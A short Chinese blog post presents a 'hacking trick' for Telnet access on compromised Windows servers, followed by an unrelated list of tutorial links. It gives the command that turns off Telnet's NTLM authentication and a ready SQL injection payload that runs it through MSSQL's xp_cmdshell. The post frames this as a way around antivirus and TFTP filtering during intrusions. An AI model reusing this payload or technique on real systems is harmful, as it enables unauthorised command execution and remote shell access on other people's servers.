一个小技巧 ntlm


相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。

1 上传ntml.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP.

2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。


今天我给大家介绍我一直在使用的办法,压箱底的哦。

那就是直接运行命令:tlntadmn config sec = -ntlm

注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证:) 赶快去试试吧。



相关阅读:
Access数据库和项目之间的数据类型的比较或映射
IIS6上传文件尺寸太小解决办法
Windows7 玩游戏屏幕出现黑边的解决方法
asp javascript值的互相传递方法
asp批量修改记录的代码
网页javascript精华代码集
深藏25年的操作系统Bug被消灭
VBS基础编程教程 (第6篇)
解决 FireFox 下[使用event很麻烦] 的问题.
为body标签和document.body都添加点击事件后仅Firefox弹出了两次
如何查出前台正在发出的SQL语句
ASP.NET中操作数据库的基本步骤分享
自写简单JS判断是否已经弹出页面
如何使用ADO来压缩或修复Microsoft Access文件
快速导航

Copyright © 2016 phpStudy | 皖ICP备18014864号-4